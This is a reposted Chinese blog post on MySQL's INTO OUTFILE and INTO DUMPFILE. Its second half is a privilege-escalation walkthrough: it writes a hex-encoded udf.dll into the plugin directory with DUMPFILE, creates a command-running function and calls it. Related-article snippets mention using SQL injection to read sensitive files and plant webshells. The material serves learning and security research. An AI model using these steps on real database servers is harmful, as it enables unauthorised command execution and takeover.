dumpfile mysql_mysql dumpfile与outfile函数的区别

最新推荐文章于 2022-07-15 14:45:28 发布
最新推荐文章于 2022-07-15 14:45:28 发布
阅读量444 收藏
点赞数
文章标签: dumpfile mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33207144/article/details/113165831
版权

一直以为两个函数作用是相同的

经过简单测试发现还是有些区别的

如下表admin

mysql> select * from admin;

+-----+-----------+---------+

| uid | name      | pass    |

+----+------------+---------+

|  1 | admin      | baidusb |

|  2 | root          | hacksb  |

|  3 | manage    | nimei    |

|  4 | boss         | helensb |

|  5 | guanli       | admin   |

|  6 | superuser  | G0Ood   |

+----+------------+---------+

mysql> select * from admin into outfile '/home/seclab/test/test1.txt';

Query OK,1 row affected (0.00 sec)

我是想将这些内容 导出到 一个txt文件,事实上是可以完整导出每行记录的.

这个很适合导库

而into dump是不行的 它只能导出 一行数据!

若我们想把一个 可执行2进制 文件用into outfile函数导出

事实上 导出后 就会被破坏

因为into outfile 函数 会 在行末端写入新行 更致命的 是会转义 换行符

这样的话这个2进制可执行 文件 就会被破坏

这时候我们用into dumpfile 就能导出 一个完整能执行的2进制 文件

into dumpfile 函数不对任何列或行进行终止,也不执行任何转义处理

如在无web脚本 执行 但是有mysql root 执行的环境下 我们就可以 通过

into dump 函数导入udf.dll进行提权

mysql> show variable like '%plugin%';

+----------------+------------------------------------------+

|Variable_name   | Value                                    |

+----------------+------------------------------------------+

| plugin_dir     |c:\mysql\mysql server 5.1\lib/plugin      |

+----------------+------------------------------------------+

mysql> select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';

mysql> select * from func; #查看是否有人创建过udf 如果有就可以省略

mysql> create function MyCmd returns string soname ''c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';

mysql> select MyCmd('whoam');

一点小知识点:

如何获取该udf.dll文件的16进制值(hex)?

我们可以本地搭建mysql环境 找个可以用的udf.dll文件 执行下面操作

mysql> select hex(load_file ('c:/windows/temp/xxoo.dll')) into outfile 'c:/windows/temp/xxoo.txt';

如何获取该udf插件的内置 函数?

通过C32 等16进制 编辑器 或直接通过记事本 打开 看关键字 即可。

mileistone
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入中的outfiledumpfile、load_file函数详解
dingpiqu2796的博客
08-18 768
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 测试如下: 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的...
mysql -- outfile/dumpfile/load_file
Nixawk
05-30 2309
mysql> select User,Password from mysql.user; +------------------+-------------------------------------------+ | User             | Password                                  | +------------------+--
mysql dumpfile与outfile函数区别
weixin_33811539的博客
04-28 822
一直以为两个函数作用是相同的   经过简单测试发现还是有些区别的   如下表admin   mysql> select * from admin;   +-----+-----------+---------+   | uid | name      | pass    |   +----+------------+---------+   |  1 | admi...
mysql outfile dumpfile
qBAYMAX的博客
04-01 344
Outfile写入,dumpfile写入,load_file读出 读写文件函数调用有限制跟secure_file_priv有关 通过命令secure @@secure_file_prive查看其值 secure_file_prive=null 禁止导入导出功能 secure_file_prive=’’ 对导出导入无限制 secure_file_prive=’特定值’ 只能向特定目录导入导出...
SQL学习 之 into outfile 和 into dumpfile
baynk的博客
03-31 5527
在学sqlmap的时候发现,写文件不用into outfile用的却是into dumpfile于是去查了一波。 the SELECT ... INTO form of SELECT enables a query result to be stored in variables or written to a file: SELECT ... INTO var_list selects col...
Mysql注入中的outfiledumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
MySQL进阶SELECT语法篇
12-15
`INTO OUTFILE`或`INTO DUMPFILE`用于将查询结果直接导出到服务器主机上的文件。`OUTFILE`将每行作为一个记录写入,而`DUMPFILE`不添加列或行分隔符。文件路径必须在服务器上可写,且文件不应预先存在。 `SELECT`...
Linux利用UDF库实现Mysql提权
09-10
然后,将这个十六进制数据转换回二进制文件,写入MySQL的插件目录,例如`SELECT unhex(hex_string) INTO DUMPFILE 'plugin_path'`。 6. **验证UDF库**:确保UDF库已正确加载,可以使用`nm`命令查看库中定义的函数,...
mysql dumpfile 与 outfile 函数区别
weixin_33739541的博客
09-25 202
在windows下验一下这两个函数区别   ubuntu下不成功,权限出错 mysql> select * from demo; +-------------+--------------+ | first_field | second_field | +-------------+--------------+ | ab | 2 ...
mysqlmysqldump文件.zip
06-24
可以使用的Linux环境下的mysqlmysqldump,可以直接用命令行的方式,连接mysql数据库
mysql数据库dump备份方法_MySQL数据库-mysqldump方式备份恢复
weixin_32017139的博客
01-19 203
1、使用gunzip命令直接恢复压缩文件,命令如下:gunzip < confluence-2020-09-28.sql.gz | mysql -uroot -p confluence2、解压后恢复sql文件,参考命令如下:# 解压文件gunzip confluence-2020-09-28.sql.gz# 恢复到数据库mysql-uroot -p confluence < confl...
[20][03][40] MySQL 注入的 outfile/dumpfile/load_file 函数详解
安全新司机
08-26 448
文章目录1. 读写文件函数调用的限制2. dumpfile 与 outfile区别3. 写入 webshell 或者 udf 下的差异 在利用 sql 注入漏洞后期,最常用的就是通过 mysqlfile 系列函数来进行读取敏感文件或者写入 webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 测试如下 1. 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secu
mysql注入中的outfiledumpfile、load_file函数详解
whatday的专栏
10-29 3339
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
mysql注入 outfile_Mysql注入中的outfiledumpfile、load_file函数详解
weixin_42297439的博客
01-19 514
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个into dumpfile()into outfile()load_file()我们本次的测试数据如下读写文件函数调用的限制因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下翻译一下...
mysqldump文件中提取某一天某一表格的sql语句
snowpay的博客
10-25 1595
#!/bin/sh ################################################################# #输入需要备份的服务器 fwq="MT2TV_2021 MT2TV_2023 MT2TV_2028 MT2TV_2029 MT2TV_2030" #输入需要备份的日期 date=20161020 #输入需要备份的表 table=tit
mysql备份dump文件
qq_30944053的博客
07-04 1716
mysqldump -ucalims_jd_dev -h172.16.2.244 -pcalims_jd_dev -P3306 calims_jiading_dev>d:/jiading.dump mysql -ucalims_jd_dev -h172.16.2.244 -pcalims_jd_dev -P3306 calims_jiading_dev<d:/jiading.dump...
mysql写文件_mysql 读写文件特性和OOB注入
weixin_32802111的博客
01-25 277
Mysql 中读写文件主要是load_file和into outfile 和 into dumpfile, mysql 的导入导出的功能从mysql5版本起都受 系统变量@@secure_file_prev 影响,我们来看一下官方的解释image.pngThis option sets the secure_file_priv system variable, which is used to ...
MySQL mysqldump数据导出详解
longe20111104的博客
07-15 6978
MySQL mysqldump数据导出详解
DUMPFILE_D
最新发布
07-27
DUMPFILE_DIR是Oracle数据库中的一个参数,用于指定数据泵导出或导入操作的dump文件的目录。根据引用\[1\]中提供的信息,可以在$ORACLE_HOME/admin/{SID}/目录下找到相关的dump文件目录,其中包括adump、bdump、cdump和udump目录。adump目录用于存放审计信息,bdump目录用于存放后台进程的trace和alert log,cdump目录用于存放core trace文件,而udump目录用于存放手动的trace文件和其他事件的dump文件。所以,DUMPFILE_DIR参数指定了这些目录的路径。 #### 引用[.reference_title] - *1* [oracle中区分audit_file_dest, background_dump_dest, core_dump_dest, user_dump_dest](https://blog.csdn.net/haiross/article/details/17360465)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [内核中 dump_stack 函数的使用](https://blog.csdn.net/Longyu_wlz/article/details/103327538)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [ffmpeg_av_dump_format](https://blog.csdn.net/u012587637/article/details/122804997)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值